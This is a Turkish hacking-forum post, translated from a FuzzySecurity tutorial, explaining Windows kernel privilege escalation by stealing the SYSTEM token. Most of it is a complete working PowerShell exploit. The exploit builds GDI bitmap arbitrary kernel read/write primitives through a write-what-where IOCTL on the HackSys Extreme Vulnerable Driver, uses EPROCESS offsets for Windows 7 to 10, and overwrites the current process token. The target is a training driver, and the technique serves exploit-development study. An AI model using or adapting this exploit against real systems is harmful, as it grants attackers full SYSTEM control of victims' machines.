İşletim sistemi, bir işlem veya iş parçacığı güvenilir bir nesneyle etkileşime girmeye çalıştığında veya belirli ayrıcalıklar gerektiren bir eylem gerçekleştirmeye çalıştığında bu belirteci sorgular.

Bizim amaçlarımız için, işlem belirteci EPROCESS yapısında sadece bir IntPtr boyutlu değerdir.

Basitçe söylemek gerekirse, bir sistem süreci bulabilirsek, belirtecini kopyalayabilir ve PowerShell belirtecinin üzerine yazabilirsek, ayrıcalıklarımızı sisteme etkili bir şekilde yükselteceğiz.İlk adım, bir sistem EPROCESS yapısına bir işaretçi elde etmektir.

Aslında, bir BSOD'DEN kaçınmak için, sadece PID 4'ü güvenli bir şekilde hedefleyebiliriz.

Sistem EPROCESS (-> PID 4) için bir işaretçi olan PsİnitialSystemProcess adlı çok kullanışlı bir genel değişken vardır.

Ntquerysystemınformation API'sini kötüye kullanarak NT çekirdeğinin temel adresini alabiliriz.

Bunu bizim için halletmek için bir senaryo, get-LoadedModules yazdım.

Psinitialsystemprocess global değişkeninin adresini almak için aşağıdaki hesaplamaları yapabiliriz.

Kod:
echo "[>] Leaking SYSTEM _EPROCESS.."
$SystemModuleArray = Get-LoadedModules
$KernelBase = $SystemModuleArray[0].ImageBase
$KernelType = ($SystemModuleArray[0].ImageName -split "\\")[-1]
$KernelHanle = [EVD]::LoadLibrary("$KernelType")
$PsInitialSystemProcess = [EVD]::GetProcAddress($KernelHanle, "PsInitialSystemProcess")
$SystemEprocess = if (!$x32Architecture) {$PsInitialSystemProcess.ToInt64() - $KernelHanle + $KernelBase} else {$PsInitialSystemProcess.ToInt32() - $KernelHanle + $KernelBase}
$CallResult = [EVD]::FreeLibrary($KernelHanle)
echo "[+] _EPORCESS list entry: 0x$("{0:X}" -f $SystemEprocess)"

x72dr1.png


Bu adres, sistem EPROCESS yapısına bir işaretçi tutmalı, bunu manuel olarak doğrulayalım.

x7URNS.png


Bu mantığı istismarımıza eklersek, sistem belirtecini kopyalamak için Bitmap okuma işlevimizi kullanabiliriz.

Dikkat edilmesi gereken bir şey daha var, EPROCESS yapısı belgelenmemiş ve oldukça sık değişiyor, bu yüzden tüm işletim sistemleri için ihtiyacımız olan çeşitli ofsetleri içeren bir switch deyimi oluşturmak isteyeceğiz (32/64 bit).

@Rwfpl'nin en mükemmel Terminus projesine bir göz atmanızı şiddetle tavsiye ederim, pastırmamı birden fazla vesileyle kurtardı.

Switch deyimi aşağıda görülebilir, ActiveProcessLinks için bir ofset içerdiğine dikkat edin, bir anda buna geleceğiz.

Kod:
# _EPROCESS UniqueProcessId/Token/ActiveProcessLinks offsets based on OS
# WARNING offsets are invalid for Pre-RTM images!
$OSVersion = [Version](Get-WmiObject Win32_OperatingSystem).Version
$OSMajorMinor = "$($OSVersion.Major).$($OSVersion.Minor)"
switch ($OSMajorMinor)
{
  '10.0' # Win10 / 2k16
  {
    if(!$x32Architecture){
      $UniqueProcessIdOffset = 0x2e8
      $TokenOffset = 0x358     
      $ActiveProcessLinks = 0x2f0
    } else {
      $UniqueProcessIdOffset = 0xb4
      $TokenOffset = 0xf4     
      $ActiveProcessLinks = 0xb8
    }
  }
 
  '6.3' # Win8.1 / 2k12R2
  {
    if(!$x32Architecture){
      $UniqueProcessIdOffset = 0x2e0
      $TokenOffset = 0x348     
      $ActiveProcessLinks = 0x2e8
    } else {
      $UniqueProcessIdOffset = 0xb4
      $TokenOffset = 0xec     
      $ActiveProcessLinks = 0xb8
    }
  }
 
  '6.2' # Win8 / 2k12
  {
    if(!$x32Architecture){
      $UniqueProcessIdOffset = 0x2e0
      $TokenOffset = 0x348     
      $ActiveProcessLinks = 0x2e8
    } else {
      $UniqueProcessIdOffset = 0xb4
      $TokenOffset = 0xec     
      $ActiveProcessLinks = 0xb8
    }
  }
 
  '6.1' # Win7 / 2k8R2
  {
    if(!$x32Architecture){
      $UniqueProcessIdOffset = 0x180
      $TokenOffset = 0x208     
      $ActiveProcessLinks = 0x188
    } else {
      $UniqueProcessIdOffset = 0xb4
      $TokenOffset = 0xf8     
      $ActiveProcessLinks = 0xb8
    }
  }
}

Doğru ofsetler ile, istismarımıza aşağıdakileri ekleyebiliriz.

Kod:
# Get EPROCESS entry for System process
echo "`n[>] Leaking SYSTEM _EPROCESS.."
$KernelBase = $SystemModuleArray[0].ImageBase
$KernelType = ($SystemModuleArray[0].ImageName -split "\\")[-1]
$KernelHanle = [EVD]::LoadLibrary("$KernelType")
$PsInitialSystemProcess = [EVD]::GetProcAddress($KernelHanle, "PsInitialSystemProcess")
$SysEprocessPtr = if (!$x32Architecture) {$PsInitialSystemProcess.ToInt64() - $KernelHanle + $KernelBase} else {$PsInitialSystemProcess.ToInt32() - $KernelHanle + $KernelBase}
$CallResult = [EVD]::FreeLibrary($KernelHanle)
echo "[+] _EPORCESS list entry: 0x$("{0:X}" -f $SysEprocessPtr)"
$SysEPROCESS = Bitmap-Read -Address $SysEprocessPtr
echo "[+] SYSTEM _EPORCESS address: 0x$("{0:X}" -f $(Bitmap-Read -Address $SysEprocessPtr))"
echo "[+] PID: $(Bitmap-Read -Address $($SysEPROCESS+$UniqueProcessIdOffset))"
echo "[+] SYSTEM Token: 0x$("{0:X}" -f $(Bitmap-Read -Address $($SysEPROCESS+$TokenOffset)))"
$SysToken = Bitmap-Read -Address $($SysEPROCESS+$TokenOffset)

x7Uv6H.png


Belirteçin 1 tarafından azaltıldığına dikkat edin, bunun nedeni belirteç öğesinin _EX_FAST_REF olması ve son bitin referans sayısı olarak kullanılmasıdır.

Yine de bu davranış hakkında endişelenmemize gerek yok.

Tam bir privesc için kalan tek şey, Powershell'in EPROCESS yapısını bulmak ve sızdırdığımız simgenin üzerine yazmaktır.

ActiveProcessLinks öğesinin devreye girdiği yer burasıdır.

Eprocess struct, ActiveProcessLinks öğesinin bir _LİST_ENTRY ([IntPtr]Flink, [IntPtr]Blink]) içerdiği ve sonraki ve önceki EPROCESS struct adreslerini gösteren bağlantılı bir listenin bir parçasıdır.

Tek yapmamız gereken, PowerShell sürecimize karşılık gelen EPROCESS yapısını bulana kadar bu listeyi geçmek ve daha sonra belirtecin üzerine yazmaktır.

Bunu yapmak için kod aşağıda görülebilir.

Kod:
# Get EPROCESS entry for current process
echo "`n[>] Leaking current _EPROCESS.."
echo "[+] Traversing ActiveProcessLinks list"
$NextProcess = $(Bitmap-Read -Address $($SysEPROCESS+$ActiveProcessLinks)) - $UniqueProcessIdOffset - [System.IntPtr]::Size
while($true) {
  $NextPID = Bitmap-Read -Address $($NextProcess+$UniqueProcessIdOffset)
  if ($NextPID -eq $PID) {
    echo "[+] PowerShell _EPORCESS address: 0x$("{0:X}" -f $NextProcess)"
    echo "[+] PID: $NextPID"
    echo "[+] PowerShell Token: 0x$("{0:X}" -f $(Bitmap-Read -Address $($NextProcess+$TokenOffset)))"
    $PoShTokenAddr = $NextProcess+$TokenOffset
    break
  }
  $NextProcess = $(Bitmap-Read -Address $($NextProcess+$ActiveProcessLinks)) - $UniqueProcessIdOffset - [System.IntPtr]::Size
}
 
# Duplicate token!
echo "`n[!] Duplicating SYSTEM token!`n"
Bitmap-Write -Address $PoShTokenAddr -Value $SysToken

OYUN BİTTİ

Hepsi bu kadar, aşağıdaki istismar Windows 7-10 üzerinde çalışmalı ve 32 ve 64 bit mimarileri desteklemelidir.

Herhangi bir olağanüstü soru varsa bir yorum bırakın!

 

Qgenays

Katılımcı Üye
20 Haz 2020
255
0
Los Santos
Kod:
Add-Type -TypeDefinition @"
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Security.Principal;
 
[StructLayout(LayoutKind.Sequential, Pack = 1)]
public struct SYSTEM_MODULE_INFORMATION
{
  [MarshalAs(UnmanagedType.ByValArray, SizeConst = 2)]
  public UIntPtr[] Reserved;
  public IntPtr ImageBase;
  public UInt32 ImageSize;
  public UInt32 Flags;
  public UInt16 LoadOrderIndex;
  public UInt16 InitOrderIndex;
  public UInt16 LoadCount;
  public UInt16 ModuleNameOffset;
  [MarshalAs(UnmanagedType.ByValArray, SizeConst = 256)]
  internal Char[] _ImageName;
  public String ImageName {
    get {
      return new String(_ImageName).Split(new Char[] {'\0'}, 2)[0];
    }
  }
}
 
[StructLayout(LayoutKind.Sequential)]
public struct _PROCESS_BASIC_INFORMATION
{
  public IntPtr ExitStatus;
  public IntPtr PebBaseAddress;
  public IntPtr AffinityMask;
  public IntPtr BasePriority;
  public UIntPtr UniqueProcessId;
  public IntPtr InheritedFromUniqueProcessId;
}
 
/// Partial _PEB
[StructLayout(LayoutKind.Explicit, Size = 256)]
public struct _PEB
{
  [FieldOffset(148)]
  public IntPtr GdiSharedHandleTable32;
  [FieldOffset(248)]
  public IntPtr GdiSharedHandleTable64;
}
 
[StructLayout(LayoutKind.Sequential)]
public struct _GDI_CELL
{
  public IntPtr pKernelAddress;
  public UInt16 wProcessId;
  public UInt16 wCount;
  public UInt16 wUpper;
  public UInt16 wType;
  public IntPtr pUserAddress;
}
 
public static class EVD
{
 
  [DllImport("ntdll.dll")]
  public static extern int NtQueryInformationProcess(
    IntPtr processHandle, 
    int processInformationClass,
    ref _PROCESS_BASIC_INFORMATION processInformation,
    int processInformationLength,
    ref int returnLength);
 
  [DllImport("ntdll.dll")]
  public static extern int NtQuerySystemInformation(
    int SystemInformationClass,
    IntPtr SystemInformation,
    int SystemInformationLength,
    ref int ReturnLength);
 
  [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
  public static extern IntPtr CreateFile(
    String lpFileName,
    UInt32 dwDesiredAccess,
    UInt32 dwShareMode,
    IntPtr lpSecurityAttributes,
    UInt32 dwCreationDisposition,
    UInt32 dwFlagsAndAttributes,
    IntPtr hTemplateFile);
  
  [DllImport("Kernel32.dll", SetLastError = true)]
  public static extern bool DeviceIoControl(
    IntPtr hDevice,
    int IoControlCode,
    byte[] InBuffer,
    int nInBufferSize,
    byte[] OutBuffer,
    int nOutBufferSize,
    ref int pBytesReturned,
    IntPtr Overlapped);
 
  [DllImport("kernel32.dll", SetLastError = true)]
  public static extern IntPtr VirtualAlloc(
    IntPtr lpAddress,
    uint dwSize,
    UInt32 flAl********Type,
    UInt32 flProtect);
 
  [DllImport("kernel32.dll", SetLastError=true)]
  public static extern bool VirtualFree(
    IntPtr lpAddress,
    uint dwSize,
    uint dwFreeType);
 
  [DllImport("kernel32", SetLastError=true, CharSet = CharSet.Ansi)]
  public static extern IntPtr LoadLibrary(
    string lpFileName);
    
  [DllImport("kernel32", CharSet=CharSet.Ansi, ExactSpelling=true, SetLastError=true)]
  public static extern IntPtr GetProcAddress(
    IntPtr hModule,
    string procName);
 
  [DllImport("kernel32.dll", SetLastError=true)]
  public static extern bool FreeLibrary(
    IntPtr hModule);
 
  [DllImport("gdi32.dll")]
  public static extern IntPtr CreateBitmap(
    int nWidth,
    int nHeight,
    uint cPlanes,
    uint cBitsPerPel,
    IntPtr lpvBits);
 
  [DllImport("gdi32.dll")]
  public static extern int SetBitmapBits(
    IntPtr hbmp,
    uint cBytes,
    byte[] lpBits);
 
  [DllImport("gdi32.dll")]
  public static extern int GetBitmapBits(
    IntPtr hbmp,
    int cbBuffer,
    IntPtr lpvBits);
}
"@
 
#==============================================[PEB]
 
# Flag architecture $x32Architecture/!$x32Architecture
if ([System.IntPtr]::Size -eq 4) {
  echo "`n[>] Target is 32-bit!"
  $x32Architecture = 1
} else {
  echo "`n[>] Target is 64-bit!"
}
# Current Proc handle
$ProcHandle = (Get-Process -Id ([System.Diagnostics.Process]::GetCurrentProcess().Id)).Handle
# Process Basic Information
$PROCESS_BASIC_INFORMATION = New-Object _PROCESS_BASIC_INFORMATION
$PROCESS_BASIC_INFORMATION_Size = [System.Runtime.InteropServices.Marshal]::SizeOf($PROCESS_BASIC_INFORMATION)
$returnLength = New-Object Int
$CallResult = [EVD]::NtQueryInformationProcess($ProcHandle, 0, [ref]$PROCESS_BASIC_INFORMATION, $PROCESS_BASIC_INFORMATION_Size, [ref]$returnLength)
# PID & PEB address
echo "`n[?] PID $($PROCESS_BASIC_INFORMATION.UniqueProcessId)"
if ($x32Architecture) {
  echo "[+] PebBaseAddress: 0x$("{0:X8}" -f $PROCESS_BASIC_INFORMATION.PebBaseAddress.ToInt32())"
} else {
  echo "[+] PebBaseAddress: 0x$("{0:X16}" -f $PROCESS_BASIC_INFORMATION.PebBaseAddress.ToInt64())"
}
# Lazy PEB parsing
$_PEB = New-Object _PEB
$_PEB = $_PEB.GetType()
$BufferOffset = $PROCESS_BASIC_INFORMATION.PebBaseAddress.ToInt64()
$NewIntPtr = New-Object System.Intptr -ArgumentList $BufferOffset
$PEBFlags = [system.runtime.interopservices.marshal]::PtrToStructure($NewIntPtr, [type]$_PEB)
# GdiSharedHandleTable
if ($x32Architecture) {
  echo "[+] GdiSharedHandleTable: 0x$("{0:X8}" -f $PEBFlags.GdiSharedHandleTable32.ToInt32())"
} else {
  echo "[+] GdiSharedHandleTable: 0x$("{0:X16}" -f $PEBFlags.GdiSharedHandleTable64.ToInt64())"
}
# _GDI_CELL size
$_GDI_CELL = New-Object _GDI_CELL
$_GDI_CELL_Size = [System.Runtime.InteropServices.Marshal]::SizeOf($_GDI_CELL)
 
#==============================================[/PEB]
 
#==============================================[Bitmap]
 
echo "`n[>] Creating Bitmaps.."
 
# Manager Bitmap
[IntPtr]$Buffer = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(0x64*0x64*4)
$ManagerBitmap = [EVD]::CreateBitmap(0x64, 0x64, 1, 32, $Buffer)
echo "[+] Manager BitMap handle: 0x$("{0:X}" -f [int]$ManagerBitmap)"
if ($x32Architecture) {
  $HandleTableEntry = $PEBFlags.GdiSharedHandleTable32.ToInt32() + ($($ManagerBitmap -band 0xffff)*$_GDI_CELL_Size)
  echo "[+] HandleTableEntry: 0x$("{0:X}" -f [UInt32]$HandleTableEntry)"
  $ManagerKernelObj = [System.Runtime.InteropServices.Marshal]::ReadInt32($HandleTableEntry)
  echo "[+] Bitmap Kernel address: 0x$("{0:X8}" -f $([System.Runtime.InteropServices.Marshal]::ReadInt32($HandleTableEntry)))"
  $ManagerpvScan0 = $([System.Runtime.InteropServices.Marshal]::ReadInt32($HandleTableEntry)) + 0x30
  echo "[+] Manager pvScan0 pointer: 0x$("{0:X8}" -f $($([System.Runtime.InteropServices.Marshal]::ReadInt32($HandleTableEntry)) + 0x30))"
} else {
  $HandleTableEntry = $PEBFlags.GdiSharedHandleTable64.ToInt64() + ($($ManagerBitmap -band 0xffff)*$_GDI_CELL_Size)
  echo "[+] HandleTableEntry: 0x$("{0:X}" -f [UInt64]$HandleTableEntry)"
  $ManagerKernelObj = [System.Runtime.InteropServices.Marshal]::ReadInt64($HandleTableEntry)
  echo "[+] Bitmap Kernel address: 0x$("{0:X16}" -f $([System.Runtime.InteropServices.Marshal]::ReadInt64($HandleTableEntry)))"
  $ManagerpvScan0 = $([System.Runtime.InteropServices.Marshal]::ReadInt64($HandleTableEntry)) + 0x50
  echo "[+] Manager pvScan0 pointer: 0x$("{0:X16}" -f $($([System.Runtime.InteropServices.Marshal]::ReadInt64($HandleTableEntry)) + 0x50))"
}
 
# Worker Bitmap
[IntPtr]$Buffer = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(0x64*0x64*4)
$WorkerBitmap = [EVD]::CreateBitmap(0x64, 0x64, 1, 32, $Buffer)
echo "[+] Worker BitMap handle: 0x$("{0:X}" -f [int]$WorkerBitmap)"
if ($x32Architecture) {
  $HandleTableEntry = $PEBFlags.GdiSharedHandleTable32.ToInt32() + ($($WorkerBitmap -band 0xffff)*$_GDI_CELL_Size)
  echo "[+] HandleTableEntry: 0x$("{0:X}" -f [UInt32]$HandleTableEntry)"
  $WorkerKernelObj = [System.Runtime.InteropServices.Marshal]::ReadInt32($HandleTableEntry)
  echo "[+] Bitmap Kernel address: 0x$("{0:X8}" -f $([System.Runtime.InteropServices.Marshal]::ReadInt32($HandleTableEntry)))"
  $WorkerpvScan0 = $([System.Runtime.InteropServices.Marshal]::ReadInt32($HandleTableEntry)) + 0x30
  echo "[+] Worker pvScan0 pointer: 0x$("{0:X8}" -f $($([System.Runtime.InteropServices.Marshal]::ReadInt32($HandleTableEntry)) + 0x30))"
} else {
  $HandleTableEntry = $PEBFlags.GdiSharedHandleTable64.ToInt64() + ($($WorkerBitmap -band 0xffff)*$_GDI_CELL_Size)
  echo "[+] HandleTableEntry: 0x$("{0:X}" -f [UInt64]$HandleTableEntry)"
  $WorkerKernelObj = [System.Runtime.InteropServices.Marshal]::ReadInt64($HandleTableEntry)
  echo "[+] Bitmap Kernel address: 0x$("{0:X16}" -f $([System.Runtime.InteropServices.Marshal]::ReadInt64($HandleTableEntry)))"
  $WorkerpvScan0 = $([System.Runtime.InteropServices.Marshal]::ReadInt64($HandleTableEntry)) + 0x50
  echo "[+] Worker pvScan0 pointer: 0x$("{0:X16}" -f $($([System.Runtime.InteropServices.Marshal]::ReadInt64($HandleTableEntry)) + 0x50))"
}
 
#==============================================[/Bitmap]
 
#==============================================[GDI ring0 primitive]
 
$hDevice = [EVD]::CreateFile("\\.\HacksysExtremeVulnerableDriver", [System.IO.FileAccess]::ReadWrite, [System.IO.FileShare]::ReadWrite, [System.IntPtr]::Zero, 0x3, 0x40000080, [System.IntPtr]::Zero)
  
if ($hDevice -eq -1) {
  echo "`n[!] Unable to get driver handle..`n"
  Return
} else {
  echo "`n[>] Driver information.."
  echo "[+] lpFileName: \\.\HacksysExtremeVulnerableDriver"
  echo "[+] Handle: $hDevice"
}
 
# [IntPtr]$WriteWhatPtr->$WriteWhat + $WriteWhere
#---
[IntPtr]$WriteWhatPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal([System.BitConverter]::GetBytes($WorkerpvScan0).Length)
[System.Runtime.InteropServices.Marshal]::Copy([System.BitConverter]::GetBytes($WorkerpvScan0), 0, $WriteWhatPtr, [System.BitConverter]::GetBytes($WorkerpvScan0).Length)
if ($x32Architecture) {
  [byte[]]$Buffer = [System.BitConverter]::GetBytes($WriteWhatPtr.ToInt32()) + [System.BitConverter]::GetBytes($ManagerpvScan0)
} else {
  [byte[]]$Buffer = [System.BitConverter]::GetBytes($WriteWhatPtr.ToInt64()) + [System.BitConverter]::GetBytes($ManagerpvScan0)
}
echo "`n[>] Sending buffer.."
echo "[+] Buffer length: $($Buffer.Length)"
echo "[+] IOCTL: 0x22200B"
[EVD]::DeviceIoControl($hDevice, 0x22200B, $Buffer, $Buffer.Length, $null, 0, [ref]0, [System.IntPtr]::Zero) |Out-null
 
#==============================================[/GDI ring0 primitive]
 
#==============================================[Leak loaded module base addresses]
 
[int]$BuffPtr_Size = 0
while ($true) {
  [IntPtr]$BuffPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($BuffPtr_Size)
  $SystemInformationLength = New-Object Int
 
  # SystemModuleInformation Class = 11
  $CallResult = [EVD]::NtQuerySystemInformation(11, $BuffPtr, $BuffPtr_Size, [ref]$SystemInformationLength)
   
  # STATUS_INFO_LENGTH_MISMATCH
  if ($CallResult -eq 0xC0000004) {
    [System.Runtime.InteropServices.Marshal]::FreeHGlobal($BuffPtr)
    [int]$BuffPtr_Size = [System.Math]::Max($BuffPtr_Size,$SystemInformationLength)
  }
  # STATUS_SUCCESS
  elseif ($CallResult -eq 0x00000000) {
    break
  }
  # Probably: 0xC0000005 -> STATUS_ACCESS_VIOLATION
  else {
    [System.Runtime.InteropServices.Marshal]::FreeHGlobal($BuffPtr)
    echo "[!] Error, NTSTATUS Value: $('{0:X}' -f ($CallResult))`n"
    return
  }
}
 
$SYSTEM_MODULE_INFORMATION = New-Object SYSTEM_MODULE_INFORMATION
$SYSTEM_MODULE_INFORMATION = $SYSTEM_MODULE_INFORMATION.GetType()
if ([System.IntPtr]::Size -eq 4) {
  $SYSTEM_MODULE_INFORMATION_Size = 284
} else {
  $SYSTEM_MODULE_INFORMATION_Size = 296
}
 
$BuffOffset = $BuffPtr.ToInt64()
$HandleCount = [System.Runtime.InteropServices.Marshal]::ReadInt32($BuffOffset)
$BuffOffset = $BuffOffset + [System.IntPtr]::Size
 
$SystemModuleArray = @()
for ($i=0; $i -lt $HandleCount; $i++){
  $SystemPointer = New-Object System.Intptr -ArgumentList $BuffOffset
  $Cast = [system.runtime.interopservices.marshal]::PtrToStructure($SystemPointer,[type]$SYSTEM_MODULE_INFORMATION)
   
  $HashTable = @{
    ImageName = $Cast.ImageName
    ImageBase = if ([System.IntPtr]::Size -eq 4) {$($Cast.ImageBase).ToInt32()} else {$($Cast.ImageBase).ToInt64()}
    ImageSize = "0x$('{0:X}' -f $Cast.ImageSize)"
  }
   
  $Object = New-Object PSObject -Property $HashTable
  $SystemModuleArray += $Object
 
  $BuffOffset = $BuffOffset + $SYSTEM_MODULE_INFORMATION_Size
}
 
# Free SystemModuleInformation array
[System.Runtime.InteropServices.Marshal]::FreeHGlobal($BuffPtr)
 
#==============================================[/Leak loaded module base addresses]
 
#==============================================[Duplicate SYSTEM token]
 
# _EPROCESS UniqueProcessId/Token/ActiveProcessLinks offsets based on OS
# WARNING offsets are invalid for Pre-RTM images!
$OSVersion = [Version](Get-WmiObject Win32_OperatingSystem).Version
$OSMajorMinor = "$($OSVersion.Major).$($OSVersion.Minor)"
switch ($OSMajorMinor)
{
  '10.0' # Win10 / 2k16
  {
    if(!$x32Architecture){
      $UniqueProcessIdOffset = 0x2e8
      $TokenOffset = 0x358     
      $ActiveProcessLinks = 0x2f0
    } else {
      $UniqueProcessIdOffset = 0xb4
      $TokenOffset = 0xf4     
      $ActiveProcessLinks = 0xb8
    }
  }
 
  '6.3' # Win8.1 / 2k12R2
  {
    if(!$x32Architecture){
      $UniqueProcessIdOffset = 0x2e0
      $TokenOffset = 0x348     
      $ActiveProcessLinks = 0x2e8
    } else {
      $UniqueProcessIdOffset = 0xb4
      $TokenOffset = 0xec     
      $ActiveProcessLinks = 0xb8
    }
  }
 
  '6.2' # Win8 / 2k12
  {
    if(!$x32Architecture){
      $UniqueProcessIdOffset = 0x2e0
      $TokenOffset = 0x348     
      $ActiveProcessLinks = 0x2e8
    } else {
      $UniqueProcessIdOffset = 0xb4
      $TokenOffset = 0xec     
      $ActiveProcessLinks = 0xb8
    }
  }
 
  '6.1' # Win7 / 2k8R2
  {
    if(!$x32Architecture){
      $UniqueProcessIdOffset = 0x180
      $TokenOffset = 0x208     
      $ActiveProcessLinks = 0x188
    } else {
      $UniqueProcessIdOffset = 0xb4
      $TokenOffset = 0xf8     
      $ActiveProcessLinks = 0xb8
    }
  }
}
 
# Arbitrary Kernel read
function Bitmap-Read {
  param ($Address)
  $CallResult = [EVD]::SetBitmapBits($ManagerBitmap, [System.IntPtr]::Size, [System.BitConverter]::GetBytes($Address))
  [IntPtr]$Pointer = [EVD]::VirtualAlloc([System.IntPtr]::Zero, [System.IntPtr]::Size, 0x3000, 0x40)
  $CallResult = [EVD]::GetBitmapBits($WorkerBitmap, [System.IntPtr]::Size, $Pointer)
  if ($x32Architecture){
    [System.Runtime.InteropServices.Marshal]::ReadInt32($Pointer)
  } else {
    [System.Runtime.InteropServices.Marshal]::ReadInt64($Pointer)
  }
  $CallResult = [EVD]::VirtualFree($Pointer, [System.IntPtr]::Size, 0x8000)
}
 
# Arbitrary Kernel write
function Bitmap-Write {
  param ($Address, $Value)
  $CallResult = [EVD]::SetBitmapBits($ManagerBitmap, [System.IntPtr]::Size, [System.BitConverter]::GetBytes($Address))
  $CallResult = [EVD]::SetBitmapBits($WorkerBitmap, [System.IntPtr]::Size, [System.BitConverter]::GetBytes($Value))
}
 
# Get EPROCESS entry for System process
echo "`n[>] Leaking SYSTEM _EPROCESS.."
$KernelBase = $SystemModuleArray[0].ImageBase
$KernelType = ($SystemModuleArray[0].ImageName -split "\\")[-1]
$KernelHanle = [EVD]::LoadLibrary("$KernelType")
$PsInitialSystemProcess = [EVD]::GetProcAddress($KernelHanle, "PsInitialSystemProcess")
$SysEprocessPtr = if (!$x32Architecture) {$PsInitialSystemProcess.ToInt64() - $KernelHanle + $KernelBase} else {$PsInitialSystemProcess.ToInt32() - $KernelHanle + $KernelBase}
$CallResult = [EVD]::FreeLibrary($KernelHanle)
echo "[+] _EPORCESS list entry: 0x$("{0:X}" -f $SysEprocessPtr)"
$SysEPROCESS = Bitmap-Read -Address $SysEprocessPtr
echo "[+] SYSTEM _EPORCESS address: 0x$("{0:X}" -f $(Bitmap-Read -Address $SysEprocessPtr))"
echo "[+] PID: $(Bitmap-Read -Address $($SysEPROCESS+$UniqueProcessIdOffset))"
echo "[+] SYSTEM Token: 0x$("{0:X}" -f $(Bitmap-Read -Address $($SysEPROCESS+$TokenOffset)))"
$SysToken = Bitmap-Read -Address $($SysEPROCESS+$TokenOffset)
 
# Get EPROCESS entry for current process
echo "`n[>] Leaking current _EPROCESS.."
echo "[+] Traversing ActiveProcessLinks list"
$NextProcess = $(Bitmap-Read -Address $($SysEPROCESS+$ActiveProcessLinks)) - $UniqueProcessIdOffset - [System.IntPtr]::Size
while($true) {
  $NextPID = Bitmap-Read -Address $($NextProcess+$UniqueProcessIdOffset)
  if ($NextPID -eq $PID) {
    echo "[+] PowerShell _EPORCESS address: 0x$("{0:X}" -f $NextProcess)"
    echo "[+] PID: $NextPID"
    echo "[+] PowerShell Token: 0x$("{0:X}" -f $(Bitmap-Read -Address $($NextProcess+$TokenOffset)))"
    $PoShTokenAddr = $NextProcess+$TokenOffset
    break
  }
  $NextProcess = $(Bitmap-Read -Address $($NextProcess+$ActiveProcessLinks)) - $UniqueProcessIdOffset - [System.IntPtr]::Size
}
 
# Duplicate token!
echo "`n[!] Duplicating SYSTEM token!`n"
Bitmap-Write -Address $PoShTokenAddr -Value $SysToken
 
#==============================================[/Duplicate SYSTEM token]

Win10 x64 v1511

x7WQWn.png


Win7 x32

x7WTF1.png


Translator: Qgenays
Source: https://www.fuzzysecurity.com/tutorials/expDev/21.html
 

THT SON MESAJLAR

Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.